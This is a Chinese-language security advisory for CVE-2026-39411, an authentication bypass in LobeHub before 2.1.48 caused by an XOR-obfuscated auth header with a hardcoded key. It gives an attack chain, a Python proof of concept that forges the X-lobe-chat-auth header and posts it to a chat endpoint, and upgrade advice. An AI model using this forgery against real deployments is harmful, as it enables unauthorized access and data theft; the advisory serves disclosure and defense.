CVE-2026-39411 CVSS 5.0 中危

CVE-2026-39411 LobeHub WebAPI认证绕过漏洞

披露日期: 2026-04-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-39411

漏洞类型

认证绕过

CVSS评分

5.0 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

LobeHub

漏洞概述

LobeHub在2.1.48之前的版本中存在WebAPI认证绕过漏洞。系统信任客户端提供的X-lobe-chat-auth头部，但该头部仅使用硬编码密钥进行简单的XOR混淆，缺乏有效的签名验证机制。攻击者可利用硬编码密钥伪造任意认证载荷，从而无需合法凭证即可访问受保护的WebAPI路由，执行未授权操作。

技术细节

该漏洞源于LobeHub WebAPI认证层的设计缺陷。应用程序依赖`X-lobe-chat-auth`请求头来验证用户身份，但该头部内容仅通过XOR算法进行混淆，未采用加密签名等强校验机制。关键的XOR密钥被硬编码在源代码仓库中，这意味着攻击者可以轻易获取密钥。攻击者可构造恶意请求，使用该密钥对伪造的用户数据（如用户ID、权限）进行XOR编码，生成合法的认证头部。当请求发送至`/webapi/chat/[provider]`等受保护端点时，服务端解密后将其视为有效凭证，从而完全绕过身份验证流程，导致系统面临未授权访问和数据泄露风险。

攻击链分析

STEP 1

信息收集

攻击者分析LobeHub源代码或已部署版本，定位到认证逻辑中的XOR密钥。

STEP 2

载荷构造

攻击者编写脚本，使用获取的硬编码密钥对伪造的用户身份信息进行XOR运算并Base64编码，生成合法的认证Token。

STEP 3

发送请求

攻击者向受影响的WebAPI路由（如/webapi/chat/[provider]）发送HTTP请求，并将伪造的Token填入X-lobe-chat-auth头部。

STEP 4

认证绕过

服务端接收请求，使用相同的硬编码密钥解密头部，验证通过，导致攻击者绕过身份验证并执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import base64
import json

# The XOR key is hardcoded in the repository.
# This is a placeholder; the actual key needs to be extracted from the source code.
XOR_KEY = b"YOUR_HARD_CODED_XOR_KEY"

def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """XOR encrypt/decrypt data with the given key."""
    return bytes([b ^ key[i % len(key)] for i, b in enumerate(data)])

def forge_auth_header(payload: dict) -> str:
    """Forges the X-lobe-chat-auth header value."""
    payload_str = json.dumps(payload)
    payload_bytes = payload_str.encode('utf-8')
    encrypted_bytes = xor_encrypt(payload_bytes, XOR_KEY)
    return base64.b64encode(encrypted_bytes).decode('utf-8')

# Target endpoint vulnerable to authentication bypass
target_url = "http://<target-host>/webapi/chat/openai"

# Payload to forge (e.g., impersonating an admin or a valid user)
# Adjust the structure based on the actual application logic
malicious_payload = {
    "userId": "admin",
    "apiKey": "fake_api_key"
}

# Generate the forged token
forged_token = forge_auth_header(malicious_payload)

headers = {
    "X-lobe-chat-auth": forged_token,
    "Content-Type": "application/json"
}

try:
    response = requests.post(target_url, headers=headers)
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    if response.status_code == 200:
        print("[+] Authentication bypass successful!")
    else:
        print("[-] Request failed, check parameters.")
except Exception as e:
    print(f"Error: {e}")

影响范围

LobeHub < 2.1.48

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，应限制受影响API端点（如/webapi/chat/*）的网络访问权限，仅允许受信任的内网IP调用，或暂时关闭相关服务功能，直至完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表